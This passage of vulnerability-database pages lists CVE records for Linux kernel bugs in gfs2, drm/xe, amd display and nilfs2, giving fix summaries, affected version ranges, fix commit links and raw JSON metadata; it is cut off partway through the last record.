Affected: fb6791d100d1bba20b5cdbc4912e1f7086ec60f8 , < d98779e687726d8f8860f1c54b5687eec5f63a73 (git)

Linux

Affected: 3.8
Unaffected: 0 , < 3.8 (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.837Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0636b34b44589b142700ac137b5f69802cfe2e37"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e42e8a24d7f02d28763d16ca7ec5fc6d1f142af0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/501cd8fabf621d10bd4893e37f6ce6c20523c8ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d98779e687726d8f8860f1c54b5687eec5f63a73"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38570",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:14:22.126008Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:56.284Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/gfs2/glock.c",
            "fs/gfs2/glock.h",
            "fs/gfs2/incore.h",
            "fs/gfs2/lock_dlm.c",
            "fs/gfs2/ops_fstype.c",
            "fs/gfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0636b34b44589b142700ac137b5f69802cfe2e37",
              "status": "affected",
              "version": "fb6791d100d1bba20b5cdbc4912e1f7086ec60f8",
              "versionType": "git"
            },
            {
              "lessThan": "e42e8a24d7f02d28763d16ca7ec5fc6d1f142af0",
              "status": "affected",
              "version": "fb6791d100d1bba20b5cdbc4912e1f7086ec60f8",
              "versionType": "git"
            },
            {
              "lessThan": "501cd8fabf621d10bd4893e37f6ce6c20523c8ca",
              "status": "affected",
              "version": "fb6791d100d1bba20b5cdbc4912e1f7086ec60f8",
              "versionType": "git"
            },
            {
              "lessThan": "d98779e687726d8f8860f1c54b5687eec5f63a73",
              "status": "affected",
              "version": "fb6791d100d1bba20b5cdbc4912e1f7086ec60f8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/gfs2/glock.c",
            "fs/gfs2/glock.h",
            "fs/gfs2/incore.h",
            "fs/gfs2/lock_dlm.c",
            "fs/gfs2/ops_fstype.c",
            "fs/gfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.8"
            },
            {
              "lessThan": "3.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix potential glock use-after-free on unmount\n\nWhen a DLM lockspace is released and there ares still locks in that\nlockspace, DLM will unlock those locks automatically.  Commit\nfb6791d100d1b started exploiting this behavior to speed up filesystem\nunmount: gfs2 would simply free glocks it didn\u0027t want to unlock and then\nrelease the lockspace.  This didn\u0027t take the bast callbacks for\nasynchronous lock contention notifications into account, which remain\nactive until until a lock is unlocked or its lockspace is released.\n\nTo prevent those callbacks from accessing deallocated objects, put the\nglocks that should not be unlocked on the sd_dead_glocks list, release\nthe lockspace, and only then free those glocks.\n\nAs an additional measure, ignore unexpected ast and bast callbacks if\nthe receiving glock is dead."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:14:20.334Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0636b34b44589b142700ac137b5f69802cfe2e37"
        },
        {
          "url": "https://git.kernel.org/stable/c/e42e8a24d7f02d28763d16ca7ec5fc6d1f142af0"
        },
        {
          "url": "https://git.kernel.org/stable/c/501cd8fabf621d10bd4893e37f6ce6c20523c8ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/d98779e687726d8f8860f1c54b5687eec5f63a73"
        }
      ],
      "title": "gfs2: Fix potential glock use-after-free on unmount",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38570",
    "datePublished": "2024-06-19T13:35:36.274Z",
    "dateReserved": "2024-06-18T19:36:34.923Z",
    "dateUpdated": "2025-05-04T09:14:20.334Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42066 (GCVE-0-2024-42066)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2025-05-04 09:22

Title

drm/xe: Fix potential integer overflow in page size calculation

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix potential integer overflow in page size calculation Explicitly cast tbo->page_alignment to u64 before bit-shifting to prevent overflow when assigning to min_page_size.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/79d54ddf0e292b810…
	https://git.kernel.org/stable/c/4f4fcafde343a5446…

Impacted products

Vendor

Product

Version

Linux

Affected: dd08ebf6c3525a7ea2186e636df064ea47281987 , < 79d54ddf0e292b810887994bb04709c5ac0e1531 (git)
Affected: dd08ebf6c3525a7ea2186e636df064ea47281987 , < 4f4fcafde343a54465f85a2909fc684918507a4b (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:31.373Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79d54ddf0e292b810887994bb04709c5ac0e1531"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f4fcafde343a54465f85a2909fc684918507a4b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42066",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:59.323646Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:55.779Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/xe/xe_ttm_vram_mgr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "79d54ddf0e292b810887994bb04709c5ac0e1531",
              "status": "affected",
              "version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
              "versionType": "git"
            },
            {
              "lessThan": "4f4fcafde343a54465f85a2909fc684918507a4b",
              "status": "affected",
              "version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/xe/xe_ttm_vram_mgr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Fix potential integer overflow in page size calculation\n\nExplicitly cast tbo-\u003epage_alignment to u64 before bit-shifting to\nprevent overflow when assigning to min_page_size."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:13.814Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/79d54ddf0e292b810887994bb04709c5ac0e1531"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f4fcafde343a54465f85a2909fc684918507a4b"
        }
      ],
      "title": "drm/xe: Fix potential integer overflow in page size calculation",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42066",
    "datePublished": "2024-07-29T15:52:30.984Z",
    "dateReserved": "2024-07-29T15:50:41.167Z",
    "dateUpdated": "2025-05-04T09:22:13.814Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-46815 (GCVE-0-2024-46815)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:35 – Updated: 2025-11-03 22:18

Title

drm/amd/display: Check num_valid_sets before accessing reader_wm_sets[]

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check num_valid_sets before accessing reader_wm_sets[] [WHY & HOW] num_valid_sets needs to be checked to avoid a negative index when accessing reader_wm_sets[num_valid_sets - 1]. This fixes an OVERRUN issue reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a72d4996409569027…
	https://git.kernel.org/stable/c/7c47dd2e92341f298…
	https://git.kernel.org/stable/c/c4a7f7c0062fe2c73…
	https://git.kernel.org/stable/c/b36e9b3104c4ba0f2…
	https://git.kernel.org/stable/c/21f9cb44f8c60bf6c…
	https://git.kernel.org/stable/c/6a4a08e45e614cfa7…
	https://git.kernel.org/stable/c/b38a4815f79b87efb…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < a72d4996409569027b4609414a14a87679b12267 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 7c47dd2e92341f2989ab73dbed07f8894593ad7b (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < c4a7f7c0062fe2c73f70bb7e335199e25bd71492 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < b36e9b3104c4ba0f2f5dd083dcf6159cb316c996 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 21f9cb44f8c60bf6c26487d428b1a09ad3e8aebf (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 6a4a08e45e614cfa7a56498cdfaeb7fae2f07fa0 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < b38a4815f79b87efb196cd5121579fc51e29a7fb (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46815",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:18:10.423569Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:18:21.693Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:59.251Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a72d4996409569027b4609414a14a87679b12267",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "7c47dd2e92341f2989ab73dbed07f8894593ad7b",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "c4a7f7c0062fe2c73f70bb7e335199e25bd71492",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "b36e9b3104c4ba0f2f5dd083dcf6159cb316c996",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "21f9cb44f8c60bf6c26487d428b1a09ad3e8aebf",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "6a4a08e45e614cfa7a56498cdfaeb7fae2f07fa0",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "b38a4815f79b87efb196cd5121579fc51e29a7fb",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check num_valid_sets before accessing reader_wm_sets[]\n\n[WHY \u0026 HOW]\nnum_valid_sets needs to be checked to avoid a negative index when\naccessing reader_wm_sets[num_valid_sets - 1].\n\nThis fixes an OVERRUN issue reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:20:39.741Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a72d4996409569027b4609414a14a87679b12267"
        },
        {
          "url": "https://git.kernel.org/stable/c/7c47dd2e92341f2989ab73dbed07f8894593ad7b"
        },
        {
          "url": "https://git.kernel.org/stable/c/c4a7f7c0062fe2c73f70bb7e335199e25bd71492"
        },
        {
          "url": "https://git.kernel.org/stable/c/b36e9b3104c4ba0f2f5dd083dcf6159cb316c996"
        },
        {
          "url": "https://git.kernel.org/stable/c/21f9cb44f8c60bf6c26487d428b1a09ad3e8aebf"
        },
        {
          "url": "https://git.kernel.org/stable/c/6a4a08e45e614cfa7a56498cdfaeb7fae2f07fa0"
        },
        {
          "url": "https://git.kernel.org/stable/c/b38a4815f79b87efb196cd5121579fc51e29a7fb"
        }
      ],
      "title": "drm/amd/display: Check num_valid_sets before accessing reader_wm_sets[]",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46815",
    "datePublished": "2024-09-27T12:35:57.062Z",
    "dateReserved": "2024-09-11T15:12:18.283Z",
    "dateUpdated": "2025-11-03T22:18:59.251Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-47669 (GCVE-0-2024-47669)

Vulnerability from cvelistv5 – Published: 2024-10-09 14:14 – Updated: 2025-11-03 22:20

Title

nilfs2: fix state management in error path of log writing function

Summary

In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix state management in error path of log writing function After commit a694291a6211 ("nilfs2: separate wait function from nilfs_segctor_write") was applied, the log writing function nilfs_segctor_do_construct() was able to issue I/O requests continuously even if user data blocks were split into multiple logs across segments, but two potential flaws were introduced in its error handling. First, if nilfs_segctor_begin_construction() fails while creating the second or subsequent logs, the log writing function returns without calling nilfs_segctor_abort_construction(), so the writeback flag set on pages/folios will remain uncleared. This causes page cache operations to hang waiting for the writeback flag. For example, truncate_inode_pages_final(), which is called via nilfs_evict_inode() when an inode is evicted from memory, will hang. Second, the NILFS_I_COLLECTED flag set on normal inodes remain uncleared. As a result, if the next log write involves checkpoint creation, that's fine, but if a partial log write is performed that does not, inodes with NILFS_I_COLLECTED set are erroneously removed from the "sc_dirty_files" list, and their data and b-tree blocks may not be written to the device, corrupting the block mapping. Fix these issues by uniformly calling nilfs_segctor_abort_construction() on failure of each step in the loop in nilfs_segctor_do_construct(), having it clean up logs and segment usages according to progress, and correcting the conditions for calling nilfs_redirty_inodes() to ensure that the NILFS_I_COLLECTED flag is cleared.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/40a2757de2c376ef8…
	https://git.kernel.org/stable/c/036441e8438b29111…
	https://git.kernel.org/stable/c/efdde00d4a1ef10bb…
	https://git.kernel.org/stable/c/3e349d7191f0688fc…
	https://git.kernel.org/stable/c/30562eff4a6dd35c4…
	https://git.kernel.org/stable/c/0a1a961bde4351dc0…
	https://git.kernel.org/stable/c/74866c16ea2183f52…
	https://git.kernel.org/stable/c/6576dd6695f2afca3…

Impacted products

Vendor

Product

Version

Linux

Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 40a2757de2c376ef8a08d9ee9c81e77f3c750adf (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 036441e8438b29111fa75008f0ce305fb4e83c0a (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < efdde00d4a1ef10bb71e09ebc67823a3d3ad725b (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 3e349d7191f0688fc9808ef24fd4e4b4ef5ca876 (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 30562eff4a6dd35c4b5be9699ef61ad9f5f20a06 (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 0a1a961bde4351dc047ffdeb2f1311ca16a700cc (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 74866c16ea2183f52925fa5d76061a1fe7f7737b (git)
Affected: a694291a6211537189c6080f77f63cdabfc9b63e , < 6576dd6695f2afca3f4954029ac4a64f82ba60ab (git)

Linux

Affected: 2.6.33
Unaffected: 0 , < 2.6.33 (semver)
Unaffected: 4.19.322 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-47669",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-10T13:20:56.031948Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-10T13:21:10.087Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:20:34.709Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/segment.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "40a2757de2c376ef8a08d9ee9c81e77f3c750adf",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "036441e8438b29111fa75008f0ce305fb4e83c0a",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "efdde00d4a1ef10bb71e09ebc67823a3d3ad725b",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "3e349d7191f0688fc9808ef24fd4e4b4ef5ca876",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "30562eff4a6dd35c4b5be9699ef61ad9f5f20a06",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "0a1a961bde4351dc047ffdeb2f1311ca16a700cc",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "74866c16ea2183f52925fa5d76061a1fe7f7737b",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            },
            {
              "lessThan": "6576dd6695f2afca3f4954029ac4a64f82ba60ab",
              "status": "affected",
              "version": "a694291a6211537189c6080f77f63cdabfc9b63e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/segment.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.33"
            },
            {
              "lessThan": "2.6.33",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.322",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
